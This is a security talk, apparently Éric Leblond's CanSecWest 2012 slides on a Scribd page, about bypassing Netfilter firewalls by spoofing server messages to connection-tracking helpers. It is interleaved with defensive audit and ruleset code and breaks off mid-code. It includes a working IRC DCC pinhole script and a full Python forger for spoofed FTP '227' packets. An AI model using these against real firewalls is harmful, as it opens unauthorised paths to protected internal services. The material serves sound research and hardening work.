Conntrack Attack

This document discusses how application layer gateways (ALGs) in Netfilter, the Linux packet filtering framework, can be exploited to bypass firewalls. It provides background on Netfilter and how it implements stateful packet inspection and ALGs through "helpers" to handle non-linear protocols like FTP. While Netfilter helpers have sane defaults that prevent opening arbitrary connections, crafting protocol messages could allow an attacker to bypass firewall rules under certain conditions if helpers are misconfigured. The document analyzes the degree of freedom helpers provide and potential impacts.

Uploaded by

Ignacio Guerrero
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
250 views123 pages

Conntrack Attack

This document discusses how application layer gateways (ALGs) in Netfilter, the Linux packet filtering framework, can be exploited to bypass firewalls. It provides background on Netfilter and how it implements stateful packet inspection and ALGs through "helpers" to handle non-linear protocols like FTP. While Netfilter helpers have sane defaults that prevent opening arbitrary connections, crafting protocol messages could allow an attacker to bypass firewall rules under certain conditions if helpers are misconfigured. The document analyzes the degree of freedom helpers provide and potential impacts.

Uploaded by

Ignacio Guerrero
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 123

Playing with network layers to bypass firewalls filtering policy
Éric Leblond
OISF

CanSecWest 2012

Éric Leblond a.k.a. Regit

French
Network security expert
Free Software enthusiast
NuFW project creator (now ufwi), EdenWall co-founder
Netfilter developer:
    Ulogd2: Netfilter logging daemon
    Misc contributions:
        NFQUEUE library and associates
        Source NAT randomisation (defeats Kaminsky's DNS attack)

Currently:
    Independent security consultant
    Suricata IDS/IPS funded developer

Introduction
    Netfilter and the Conntrack
    Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
    Attack description
    Conditions and principles
    FTP case
    Other protocols
Impact and existing protection
    Netfilter
    Checkpoint
Conclusion

Netfilter

Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.

Features
Stateful and stateless packet filtering (IPv4 and IPv6).
Network address and port translation.
Multiple layers of APIs for 3rd party extensions.

Iptables
Command line utility to do operations on rules.
It has access to all Netfilter features.
Two utilities: iptables for IPv4, ip6tables for IPv6.
    iptables -A FORWARD -p tcp --syn --dport 80 \
        -m connlimit --connlimit-above 2 -j REJECT

Netfilter's stateful inspection

Netfilter keeps a list of all active connections.
The packet's connection is looked up in the connections list (the conntrack).
The packet is tagged with one of the following states:
    NEW
    ESTABLISHED
    INVALID
The state can be used to decide on the fate of the packet:
    iptables -A FORWARD -m state --state ESTABLISHED -j ACCEPT
    iptables -A FORWARD -m state --state NEW -p tcp --dport 80 -j ACCEPT

Application Level Gateway

Non-linear protocol
Protocols such as FTP or SIP:
    rely on a signalling channel,
    which is used to set up dynamic connections.

Application Level Gateway (ALG)
ALGs search the traffic for command messages.
They extract information on the expected connections.
Each expectation:
    includes information on a potential connection,
    is associated with a timeout.
A new connection matching an expectation can be accepted.

The example of FTP

FTP client
    Logged into ftp.lip6.fr.
    ncftp / > ls
    etc/
    jussieu/
    lip6/

Tcpdump
    195.83.118.1.21 > 10.62.101.203.52994
    195.83.118.1.21 > 10.62.101.203.52994
    10.62.101.203.57636 > 195.83.118.1.51155
    10.62.101.203.52994 > 195.83.118.1.21
    195.83.118.1.51155 > 10.62.101.203.57636

Protocol
    C: PASV
    S: 227 Entering Passive Mode (195,83,118,1,199,211)
    C: MLSD
    S: 150 Opening ASCII mode data connection for MLSD.
    S: 226 MLSD complete.
    C: QUIT

Netfilter
    # conntrack -E expect
    [NEW] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=51155
    [DESTROY] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=51155
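
The expectation events above are also a useful audit source: every pinhole a helper opens shows up as a [NEW] expect event before any packet matches it. The following is an added example (not code from the slides or from the conntrack tools) that parses event lines in the format the slide shows and flags expectations a correctly configured helper should never create: a destination port below 1024, a destination other than the one server the helper was enabled for, or a burst of NEW expectations from one client. The sample lines, the allowed server address and the thresholds are constructed for the example.

```python
"""Audit `conntrack -E expect` output for expectations that violate the
helper policy from the slides (RELATED only to the FTP server, ports >= 1024).

Added example, not part of Éric Leblond's slides: the event lines, allowed
server, port floor and rate threshold below are constructed assumptions.
"""
import re
from collections import Counter

# Line format as shown on the slide; trailing fields (if any) are ignored.
EVENT_RE = re.compile(
    r"^\[(?P<event>NEW|DESTROY)\]\s+(?P<timeout>\d+)\s+proto=(?P<proto>\d+)\s+"
    r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+sport=(?P<sport>\d+)\s+dport=(?P<dport>\d+)"
)


def parse_expect_event(line):
    """Return the expectation as a dict, or None if the line is not an expect event."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    for key in ("timeout", "proto", "sport", "dport"):
        ev[key] = int(ev[key])
    return ev


def audit_expectations(lines, allowed_dst, min_dport=1024, max_new_per_src=3):
    """Return a list of (reason, event) alerts for NEW expectations.

    privileged-port    : the pinhole would land on a port below min_dport
                         (the demo's forged reply targets port 22).
    unexpected-server  : dst is not the server the helper was enabled for
                         (the -d $MY_FTP_SERVER condition in the slides' rules).
    expectation-flood  : one source created more than max_new_per_src NEW
                         expectations in this batch (message forging/fuzzing).
    """
    alerts = []
    new_per_src = Counter()
    for line in lines:
        ev = parse_expect_event(line)
        if ev is None or ev["event"] != "NEW":
            continue
        if ev["dport"] < min_dport:
            alerts.append(("privileged-port", ev))
        if ev["dst"] != allowed_dst:
            alerts.append(("unexpected-server", ev))
        new_per_src[ev["src"]] += 1
        if new_per_src[ev["src"]] == max_new_per_src + 1:
            alerts.append(("expectation-flood", ev))
    return alerts


# Constructed sample: the legitimate PASV expectation from the slide, then an
# expectation on port 22 of the server, then one pointing at a third host.
SAMPLE_EVENTS = [
    "[NEW] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=51155",
    "[DESTROY] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=51155",
    "[NEW] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=22",
    "[NEW] 300 proto=6 src=10.62.101.203 dst=192.168.2.2 sport=0 dport=3306",
]

if __name__ == "__main__":
    for reason, ev in audit_expectations(SAMPLE_EVENTS, allowed_dst="195.83.118.1"):
        print("%-18s src=%s dst=%s dport=%d" % (reason, ev["src"], ev["dst"], ev["dport"]))
```

Run against the constructed lines it reports the port 22 expectation as privileged-port and the 192.168.2.2 one as unexpected-server; the legitimate 51155 pinhole passes. In production you would pipe `conntrack -E expect` into it and forward the alerts to your SIEM.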

Details of Netfilter implementation

ALGs in Netfilter
ALGs are called Helpers.
Each protocol is implemented as a kernel module.
Loading options can be used to configure the helper.
Fine-grained setup can be achieved with the CT iptables target.

Current modules list in the vanilla Linux kernel
    amanda, broadcast, ftp, h323, ipv4, ipv6, irc, netbios_ns, pptp,
    proto_dccp, proto_gre, proto_sctp, proto_udplite, sane, sip, snmp, tftp

Expectations in Netfilter

The expectation table
Expectations are stored in a specific table.
It is similar to the conntrack table.
Only one tuple is used.
A short timeout is added.
An entry is destroyed when it matches a packet.
As a response, a new connection entry is created.
It is RELATED to the signalling connection.

Accepting RELATED connections
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the firewall?
Do helpers turn my firewall into an open bar?

A study is needed.
Let's look at the helpers.

Degree of freedom of Netfilter helpers

Module           Source   Destination   Port Dest   Option
ftp              Fixed    In CMD        In CMD      loose = 1 (dflt)
ftp              Full     In CMD        In CMD      loose = 0
h323             Fixed    Fixed         In CMD
irc              Full     Fixed         In CMD
sip signalling   Fixed    Fixed         In CMD      sip_direct_signalling = 1 (dflt)
sip signalling   Full     In CMD        In CMD      sip_direct_signalling = 0

Legend:
    Fixed: the value comes from the signalling connection. It can't be forged.
    In CMD: the value comes from protocol message parsing and can be forged.
    Full: freedom is total. All values are accepted.

Options are specific to Netfilter.
However the degree of freedom will be similar for any firewall using ALGs.

Global analysis

Sane defaults
Dangerous extensions of protocols have been disabled.
If we study the attack of a client on a server:
    It is impossible to open arbitrary connections to the server.
    The level of security is acceptable.

In the limits of protocols
Security is ensured with regard to the protocol usability.
The IRC helper is really user-friendly.

FTP analysis

If we follow the RFC (loose = 0):
    An FTP server can participate in the initialization of a connection from the client to another server.
    It can open arbitrary connections through the firewall.

If we care about security (loose = 1):
    Expectations are statically bound to the server address.
    The possible openings are acceptable.
    This is the default value.

IRC analysis

The DCC command
The DCC command enables transfers between end-points.
It is impossible to know the source address.
The destination port is fixed by the client.

Consequences
Allowing DCC thus allows the client to enable arbitrary connections to its IP.
The client computer is given complete freedom of connection opening.

"A mistake is simply another way of doing things." (Katharine Graham)

Using the DCC command

Client NATed behind the firewall, port N is closed.
Client sends a DCC command to a valid IRC server.
Firewall creates an expectation and the laptop can open a connection.

Exploit code
    import socket

    def ipnumber(ip):
        # Encode a dotted-quad address as the 32-bit integer used by DCC
        ip = ip.rstrip().split('.')
        ipn = 0
        while ip:
            ipn = (ipn << 8) + int(ip.pop(0))
        return ipn

    host = "irc.freenode.net"
    dport = 6667  # IRC port
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, dport))
    ip = "192.168.1.129"  # Local address of client
    port = 6000  # Port to open on Internet
    atmsg = 'PRIVMSG opensvp :\x01DCC CHAT CHAT %d %d\x01\r\n' \
        % (ipnumber(ip), port)
    s.send(atmsg.encode())  # bytes on the wire (Python 3)
    s.close()

Demonstration of DCC usage

Video
Let's connect from the Internet to port 6000 of a NATed client.

Secure use of Netfilter helpers

Disable helpers by default
Load with port 0 or use a dedicated proc entry (after the 3.3 Linux kernel):
    modprobe nf_conntrack_ftp ports=0

Use the CT target
Activate the helper for chosen connections and do explicit authorization of RELATED traffic:
    iptables -A PREROUTING -t raw -p tcp --dport 21 \
        -d $MY_FTP_SERVER -j CT --helper ftp
    iptables -A FORWARD -m conntrack --ctstate RELATED \
        -m helper --helper ftp -d $MY_FTP_SERVER \
        -p tcp --dport 1024: -j ACCEPT

More information
See http://home.regit.org/netfilter-en/secure-use-of-helpers/

Known attacks

Cisco Bug ID CSCdr09226
Goal: open a pinhole in the firewall.
Force the server to generate a message interpreted as a command by the firewall.
An error condition can be used to trigger the abnormal behaviour.
https://listserv.icsalabs.com/pipermail/firewall-wizards/2000-March/008385.html

A Stateful Inspection of FireWall-1
Panorama of attacks on Checkpoint FireWall-1.
Interesting techniques using FWZ encapsulation.
T. Lopatic, J. McDonald, D. Song, Black Hat Briefings 2000

Objective

Determine if it is possible, as a client, to trigger unwanted behaviour:
    Can we open arbitrary pinholes through a firewall?
    Can we open more ports on a server?
    Can we access a badly protected service?
        Such as an internal database
        Such as vulnerable services

Our study of helpers has shown that it is not possible out of the box:
    Client capabilities are always limited.
    Dangerous extensions have been blocked.

An alternative approach should be found.

Basic idea

Only the server can send useful messages.
We need to trigger the server to send a crafted message.
We can't force the server to do it.
One can consider sending a message on behalf of the server:
    A computer can forge any IP packet
    and send it to the gateway
    if the computer is on the same Ethernet network as the gateway.

An attacker on a directly connected network can send packets:
    to the Ethernet address of the firewall
    with the IP address of the server.

Let's try to use this method.

Attack description

1. The attacker opens a network connection using a given protocol.
2. He sniffs the network traffic for that protocol.
3. He gets one packet coming from the server and forges a reply from it:
    Invert source and destination Ethernet addresses.
    Modify the payload to a server command, choosing parameters.
    Increment the IP id.
    Set the TCP sequence number correctly using traffic data.
    Update all checksums and lengths.
4. The attacker sends the forged packet to the network.
5. The firewall sees the forged request.
6. The firewall creates an expectation with the parameters "given by the server".
7. The attacker opens a connection with the chosen parameters.

FTP protocol study

Dynamic connection
In FTP, dynamic connections can be opened to the server:
    The server sends a message to the client to indicate which port to use.
    The client then connects to the provided IP and port.

IPv4 case
To ask a client to connect to 192.168.2.2 on port 3306:
    227 Entering Passive Mode (192,168,2,2,12,234)\r\n
The message format is simple; the only trick to know is that 12 * 256 + 234 = 3306.

IPv6 case
To ask a client to connect on port 3306:
    229 Extended Passive Mode OK (|||3306|)\r\n
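
To make concrete what the helper extracts from these two reply formats, and why the "Secure use of Netfilter helpers" rules still matter once expectations are bound to the server address, here is an added example (not code from the slides, and not Netfilter's nf_conntrack_ftp). It parses a 227 or 229 reply into the expectation tuple a helper would register, refuses a 227 whose address is not the server the client is talking to (the address-bound behaviour the slides describe), and then runs the resulting pinhole through a policy mirroring the slides' `-m helper --helper ftp -d $MY_FTP_SERVER -p tcp --dport 1024:` rule. The Expectation class, the evaluate() outcomes and the sample addresses are constructed for this example.

```python
"""Model of an FTP helper's reply parsing plus the RELATED policy from the
"Secure use of Netfilter helpers" slide.

Added example, not code from the slides or from Netfilter. Addresses, the
Expectation type and the policy thresholds are constructed assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass

# 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)   and   229 ... (|||port|)
PASV_RE = re.compile(r"^227 .*\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
EPSV_RE = re.compile(r"^229 .*\(\|\|\|(\d+)\|\)")


@dataclass(frozen=True)
class Expectation:
    src: str            # client address ("Fixed" in the slides' table)
    dst: str            # where the data connection will go ("In CMD")
    dport: int          # port taken from the reply ("In CMD")
    helper: str = "ftp"


def parse_ftp_reply(reply, client_ip, server_ip):
    """Return the Expectation a helper would register for this server reply,
    or None if it is not a passive-mode reply or fails the address check."""
    m = PASV_RE.match(reply)
    if m:
        h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
        if not all(0 <= v <= 255 for v in (h1, h2, h3, h4, p1, p2)):
            return None
        addr = "%d.%d.%d.%d" % (h1, h2, h3, h4)
        port = p1 * 256 + p2                 # 12 * 256 + 234 == 3306
        # Address-bound mode: a 227 naming a host other than the server
        # that sent it creates no expectation at all.
        if ipaddress.ip_address(addr) != ipaddress.ip_address(server_ip):
            return None
        return Expectation(src=client_ip, dst=addr, dport=port)
    m = EPSV_RE.match(reply)
    if m:
        port = int(m.group(1))
        if not 0 < port < 65536:
            return None
        # 229 carries only a port: the address is always the signalling peer.
        return Expectation(src=client_ip, dst=server_ip, dport=port)
    return None


def related_allowed(exp, ftp_server, min_port=1024):
    """The slides' FORWARD rule: RELATED traffic is accepted only when it was
    created by the ftp helper, targets the designated FTP server and lands on
    an unprivileged port. Everything else falls through to the default drop."""
    return exp.helper == "ftp" and exp.dst == ftp_server and exp.dport >= min_port


def evaluate(reply, client_ip, server_ip, ftp_server):
    """Return 'no-expectation', 'accepted' or 'blocked-by-policy'."""
    exp = parse_ftp_reply(reply, client_ip, server_ip)
    if exp is None:
        return "no-expectation"
    return "accepted" if related_allowed(exp, ftp_server) else "blocked-by-policy"


if __name__ == "__main__":
    # Constructed inputs: the PASV reply from the slides' tcpdump, a reply
    # pointing at port 22 of the same server, a 227 naming a third host,
    # and the IPv6-style 229 reply.
    client, server = "10.62.101.203", "195.83.118.1"
    for reply in (
        "227 Entering Passive Mode (195,83,118,1,199,211)\r\n",
        "227 Entering Passive Mode (195,83,118,1,0,22)\r\n",
        "227 Entering Passive Mode (192,168,2,2,12,234)\r\n",
        "229 Extended Passive Mode OK (|||3306|)\r\n",
    ):
        print("%-50s -> %s" % (reply.strip(), evaluate(reply, client, server, server)))
```

The point of the two-stage check is visible in the second input: binding expectations to the server address does not stop a reply that names the server itself with a low port, so the pinhole is created, and only the `--dport 1024:` condition in the RELATED rule keeps it from being usable. The third input shows the address check doing its job: no expectation is created for a third host.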

Attack description for FTP

1. The attacker sniffs the traffic coming from an FTP server.
2. He opens a connection to the FTP server.
3. He forges a packet using the last packet received from the server:
   - Invert the source and destination Ethernet addresses (the IP addresses and ports stay as they are: the packet must still look like it comes from the server).
   - Increment the IP ID. Set the TCP sequence number correctly using the sniffed traffic data.
   - Modify the payload to a server reply with parameters of his choosing:
     227 Entering Passive Mode (192,168,2,2,12,234)
   - Update all checksums and lengths.
4. The attacker sends the forged packet to the firewall.
5. The firewall creates an expectation for a connection to 192.168.2.2 on port 3306 (12 * 256 + 234).
6. The attacker connects to 192.168.2.2 on port 3306.
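The forging steps above, carried out on a raw Ethernet/IPv4/TCP frame. This is an added example written for this page in plain Python 3 (standard library only); it is not the opensvp script nor any code from the talk. It parses the last frame received from the server, inverts the Ethernet addresses, increments the IP ID, continues the server's sequence number, replaces the payload with a chosen 227 reply and recomputes both lengths and both checksums. The MAC addresses, the attacker address 10.0.0.5, the client port 40000 and the `230 Login successful.` reply are constructed sample data; 192.168.2.2 and port 3306 are the values from the slide. `parse_passive_mode_reply` mirrors what a conntrack helper extracts from the 227 line, which is how (12,234) turns into port 3306. Putting the frame on the wire (a raw socket, or a tool such as opensvp) is deliberately left out.

```python
"""Forge the FTP '227' reply used by the attack (Python 3, standard library only)."""
import struct

PSH_ACK = 0x018


def _aton(ip):
    """Dotted quad -> 4 bytes (keeps the socket module out of the example)."""
    return bytes(int(x) for x in ip.split("."))


def _ntoa(raw):
    return ".".join(str(b) for b in raw)


def inet_checksum(data):
    """RFC 1071 one's-complement checksum; returns 0 when 'data' already carries a valid one."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def passive_mode_reply(ip, port):
    """The 227 line the helper parses; the port is sent as p1*256+p2."""
    h1, h2, h3, h4 = ip.split(".")
    return ("227 Entering Passive Mode (%s,%s,%s,%s,%d,%d)\r\n"
            % (h1, h2, h3, h4, port >> 8, port & 0xFF)).encode()


def parse_passive_mode_reply(line):
    """What a conntrack helper extracts from a 227 line: (ip, port) of the expected data connection."""
    inside = line.decode().split("(")[1].split(")")[0]
    h1, h2, h3, h4, p1, p2 = (int(x) for x in inside.split(","))
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


def parse_frame(frame):
    """Decode Ethernet/IPv4/TCP; IP options are not expected, TCP options are skipped."""
    eth_dst, eth_src, _ethertype = struct.unpack("!6s6sH", frame[:14])
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len, ip_id = struct.unpack("!HH", ip[2:6])
    tcp = ip[ihl:total_len]
    sport, dport, seq, ack, off_flags, win = struct.unpack("!HHIIHH", tcp[:16])
    data_off = (off_flags >> 12) * 4
    return dict(eth_dst=eth_dst, eth_src=eth_src,
                src=_ntoa(ip[12:16]), dst=_ntoa(ip[16:20]), ip_id=ip_id, ttl=ip[8],
                sport=sport, dport=dport, seq=seq, ack=ack,
                flags=off_flags & 0x1FF, win=win, payload=tcp[data_off:])


def build_frame(eth_dst, eth_src, src, dst, ip_id, ttl,
                sport, dport, seq, ack, flags, win, payload):
    """Assemble a frame, filling in both lengths and both checksums."""
    tcp_len = 20 + len(payload)
    tcp_hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                          (5 << 12) | flags, win, 0, 0)
    pseudo = _aton(src) + _aton(dst) + struct.pack("!BBH", 0, 6, tcp_len)
    tcp_csum = inet_checksum(pseudo + tcp_hdr + payload)
    tcp_hdr = tcp_hdr[:16] + struct.pack("!H", tcp_csum) + tcp_hdr[18:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, ip_id,
                         0x4000, ttl, 6, 0, _aton(src), _aton(dst))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", inet_checksum(ip_hdr)) + ip_hdr[12:]
    return struct.pack("!6s6sH", eth_dst, eth_src, 0x0800) + ip_hdr + tcp_hdr + payload


def checksums_ok(frame):
    """True when the IP header checksum and the TCP checksum both verify."""
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return inet_checksum(ip[:ihl]) == 0 and inet_checksum(pseudo + tcp) == 0


def forge_passive_reply(last_server_frame, target_ip, target_port):
    """Step 3 of the attack: turn the last frame seen from the server into a
    '227' reply that the firewall will attribute to the server."""
    p = parse_frame(last_server_frame)
    return build_frame(
        eth_dst=p["eth_src"], eth_src=p["eth_dst"],       # invert Ethernet addresses: back to the firewall
        src=p["src"], dst=p["dst"],                       # IP addresses unchanged: still "from the server"
        ip_id=(p["ip_id"] + 1) & 0xFFFF,                  # increment the IP ID
        ttl=p["ttl"],
        sport=p["sport"], dport=p["dport"],
        seq=(p["seq"] + len(p["payload"])) & 0xFFFFFFFF,  # next byte of the server's stream
        ack=p["ack"],
        flags=PSH_ACK, win=p["win"],
        payload=passive_mode_reply(target_ip, target_port))  # chosen parameters; lengths and checksums redone


# Constructed sample: the last control-channel frame the attacker sniffed.
# Its source MAC is the firewall's, since the frame was routed to the attacker.
FIREWALL_MAC = bytes.fromhex("020000000201")
ATTACKER_MAC = bytes.fromhex("020000000a05")
LAST_SERVER_FRAME = build_frame(
    eth_dst=ATTACKER_MAC, eth_src=FIREWALL_MAC,
    src="192.168.2.2", dst="10.0.0.5", ip_id=0x1234, ttl=63,
    sport=21, dport=40000, seq=1000, ack=2000, flags=PSH_ACK, win=29200,
    payload=b"230 Login successful.\r\n")

if __name__ == "__main__":
    forged = forge_passive_reply(LAST_SERVER_FRAME, "192.168.2.2", 3306)
    f = parse_frame(forged)
    print(f["payload"], "->", parse_passive_mode_reply(f["payload"]))
    print("seq", f["seq"], "ip_id", hex(f["ip_id"]), "checksums ok:", checksums_ok(forged))
```

Run it as a script to print the forged payload, its sequence number and the checksum verification. Only the Ethernet addresses are swapped: the IP addresses and ports have to stay exactly as in the sniffed frame, because the firewall must match the packet to the existing control connection before its helper attributes the 227 line to the server.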

Demonstration on Netfilter

Video: let's take a firewall with a filtering policy allowing only port 21, and open a connection to port 22 on the FTP server.

Policy violation

We've managed to open a connection to port 22, with a filtering policy that does not allow it.
Easy little cat, easy!

Counter-measures

Anti-spoofing is sufficient to block the attack.
Reverse path filtering is our friend: only accept a packet on an interface if the route back to its source IP goes through that interface.
This prevents the kernel from handling the attack packet at all: the spoofed server address arrives on the attacker's interface, not on the one that routes to the server.

Is it that easy to be protected? Yes.
But wait, there is still a surprise.

Other protocols

IRC
As discussed before, the IRC helper gives the client great power.
The issue is inverted: can we act against the client?
The same technique applies under the following conditions:
- Attacker and client are separated by the firewall.
- Attacker is on a network directly connected to the firewall.
- IRC traffic can be sniffed by the attacker (MITM or server).
This is not interesting.

SIP
The server sends port parameters in a similar way to FTP.
The same attack is possible; only the content of the forged payload has to be changed.

Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
    Attack description
    Conditions and principles
    FTP case
    Other protocols
Impact and existing protection
    Netfilter
    Checkpoint
Conclusion

Protection for Netfilter

We only have to use the rp_filter feature.
It has been available in every Linux kernel since last century.
Disabled by default. Enabled by all decent firewall scripts.
To activate it:
echo "1" > /proc/sys/net/ipv4/conf/all/rp_filter
The value matters: 1 is strict mode (the route back to the packet's source must go through the interface it arrived on). 2 is loose mode, which only checks that the source is reachable through some interface, and therefore does not stop this packet. The kernel uses the highest value between conf/all and conf/<interface>.

Wait, and for IPv6?
No problem, let's set the value in /proc:
echo "1" > /proc/sys/net/ipv6/conf/all/rp_filter
/proc/sys/net/ipv6/conf/all/rp_filter: No such file or directory

"Okay, Houston, we've had a problem here." (Jack Swigert)
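A check for the first counter-measure, added here as an example and not part of the slides. It audits IPv4 rp_filter the way the kernel evaluates it: the effective mode of an interface is the maximum of conf/all/rp_filter and conf/<interface>/rp_filter, and only value 1 (strict mode) blocks the packet of this attack, because loose mode (value 2) merely requires the spoofed source to be reachable through some interface, which a server address always is. The `demo_conf` helper builds a throw-away copy of the /proc tree from constructed values so the audit runs without root or a real kernel; the `sysctl -w` lines it proposes are standard sysctl syntax. Strict mode can break asymmetric routing, which is the usual reason an interface ends up at 2; that trade-off is for the operator, not the script.

```python
"""Audit IPv4 reverse path filtering the way the kernel evaluates it (standard library only)."""
import os
import tempfile

OFF, STRICT, LOOSE = 0, 1, 2


def read_rp_filter(conf_dir, name):
    with open(os.path.join(conf_dir, name, "rp_filter")) as f:
        return int(f.read().strip())


def effective_rp_filter(conf_dir="/proc/sys/net/ipv4/conf"):
    """Return {interface: effective rp_filter value}.

    The kernel applies max(conf/all, conf/<iface>): a 1 in conf/all is
    overridden by a 2 on one interface (loose mode wins), and a 0 on an
    interface is overridden by a 1 in conf/all. 'all' and 'default' are not
    interfaces and are skipped.
    """
    all_value = read_rp_filter(conf_dir, "all")
    return {iface: max(all_value, read_rp_filter(conf_dir, iface))
            for iface in sorted(os.listdir(conf_dir))
            if iface not in ("all", "default")}


def interfaces_not_strict(conf_dir="/proc/sys/net/ipv4/conf"):
    """Interfaces on which the attack packet (source = server address, arriving
    from the attacker's side) would still reach conntrack: filtering is off, or
    loose mode, which only asks that the source be reachable through some interface."""
    return [(iface, value) for iface, value in effective_rp_filter(conf_dir).items()
            if value != STRICT]


def remediation_commands(conf_dir="/proc/sys/net/ipv4/conf"):
    """sysctl commands bringing every interface to strict mode. conf/all must
    be 1 whenever an interface is off; every interface sitting at 2 must be
    lowered itself, since max() would otherwise keep it loose."""
    all_value = read_rp_filter(conf_dir, "all")
    effective = effective_rp_filter(conf_dir)
    cmds = []
    if all_value == LOOSE or OFF in effective.values():
        cmds.append("sysctl -w net.ipv4.conf.all.rp_filter=1")
    for iface in sorted(effective):
        if read_rp_filter(conf_dir, iface) == LOOSE:
            cmds.append("sysctl -w net.ipv4.conf.%s.rp_filter=1" % iface)
    return cmds


def demo_conf(values):
    """Build a throw-away copy of /proc/sys/net/ipv4/conf from constructed
    values ({name: rp_filter}), so the audit can run without a real kernel."""
    root = tempfile.mkdtemp(prefix="rp_filter_")
    for name, value in values.items():
        os.makedirs(os.path.join(root, name))
        with open(os.path.join(root, name, "rp_filter"), "w") as f:
            f.write("%d\n" % value)
    return root


if __name__ == "__main__":
    for iface, value in interfaces_not_strict():
        print("%s: effective rp_filter %d (not strict)" % (iface, value))
    for cmd in remediation_commands():
        print(cmd)
```

Run without arguments it audits the live /proc tree; the functions take a directory so the same logic can be pointed at a copy taken from another host.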

IPv6 protection for Netfilter

A manual setup is needed.
Dedicated ip6tables rules need to be written.
The network topology needs to be known.
Good implementations already implement these rules.
But do they resist the attack?

IPv6 protection for Netfilter

The bad ruleset
ip6tables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
ip6tables -A FORWARD -i $CLIENT_IFACE ! -s $CLIENT_NET -j DROP

The attack packet is valid for Netfilter: it belongs to an established connection.
It is accepted by the first rule and never reaches the anti-spoofing rule.

The good ruleset
ip6tables -t raw -A PREROUTING -i $CLIENT_IFACE ! -s $CLIENT_NET -j DROP

The raw table is traversed before the FORWARD chain, and even before connection tracking.
The packet is dropped before it can cause any problem.
Ordering is the whole point: an anti-spoofing DROP placed before the ESTABLISHED,RELATED rule in FORWARD would also work, but the raw table is the earliest place, and the one that does not depend on the rest of the ruleset.
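A generator for the good ruleset above, extended to a whole topology. This is an added example, not code from the talk or from any iptables frontend. It assumes a topology given as interface -> list of IPv6 prefixes, emits one raw-table chain per interface (RETURN for every legitimate source, DROP for everything else, jumped to from PREROUTING so it runs before connection tracking), refuses topologies where one prefix is routed through two interfaces, and evaluates the result for a given packet so the attack case can be checked. The exceptions for link-local sources (fe80::/10, used by neighbor discovery and router advertisements) and the unspecified address (::, used by duplicate address detection) are this example's assumption about what a real deployment needs, not something the slides state.

```python
"""Generate and evaluate ip6tables raw-table anti-spoofing rules from a topology (standard library only)."""
import ipaddress

# Sources accepted on every interface even though they are in no routed prefix
# (assumption of this example): link-local addresses, needed for neighbor
# discovery and router advertisements, and the unspecified address used by
# duplicate address detection.
ALWAYS_ALLOWED = ("fe80::/10", "::/128")


def _nets(prefixes):
    return [ipaddress.ip_network(p) for p in prefixes]


def check_topology(topology):
    """Return a list of problems. A prefix must be routed through exactly one
    interface: if two interfaces share a prefix, a source from that prefix
    cannot be told apart from a spoofed one."""
    problems, seen = [], []
    for iface, prefixes in topology.items():
        for net in _nets(prefixes):
            if net.version != 6:
                problems.append("%s on %s is not an IPv6 prefix" % (net, iface))
            for other_iface, other in seen:
                if other_iface != iface and net.overlaps(other):
                    problems.append("%s on %s overlaps %s on %s"
                                    % (net, iface, other, other_iface))
            seen.append((iface, net))
    return problems


def antispoof_rules(topology, table="raw"):
    """One chain per interface: RETURN for each legitimate source, DROP for
    anything else, jumped to from PREROUTING so it runs before conntrack."""
    problems = check_topology(topology)
    if problems:
        raise ValueError("; ".join(problems))
    rules = []
    for iface, prefixes in topology.items():
        chain = "ANTISPOOF_" + iface.upper().replace("-", "_")
        rules.append("ip6tables -t %s -N %s" % (table, chain))
        for net in list(ALWAYS_ALLOWED) + [str(n) for n in _nets(prefixes)]:
            rules.append("ip6tables -t %s -A %s -s %s -j RETURN" % (table, chain, net))
        rules.append("ip6tables -t %s -A %s -j DROP" % (table, chain))
        rules.append("ip6tables -t %s -A PREROUTING -i %s -j %s" % (table, iface, chain))
    return rules


def would_drop(topology, in_iface, source):
    """Evaluate the generated ruleset for one packet: dropped unless its source
    is link-local/unspecified or belongs to a prefix routed through in_iface.
    An interface absent from the topology has no rule, so nothing is dropped there."""
    if in_iface not in topology:
        return False
    src = ipaddress.ip_address(source)
    allowed = _nets(ALWAYS_ALLOWED) + _nets(topology[in_iface])
    return not any(src in net for net in allowed)


if __name__ == "__main__":
    # Constructed topology: clients on eth0, the FTP server's network on eth1.
    topo = {"eth0": ["2001:db8:1::/64"], "eth1": ["2001:db8:2::/64"]}
    print("\n".join(antispoof_rules(topo)))
    print("server address from the client side dropped:",
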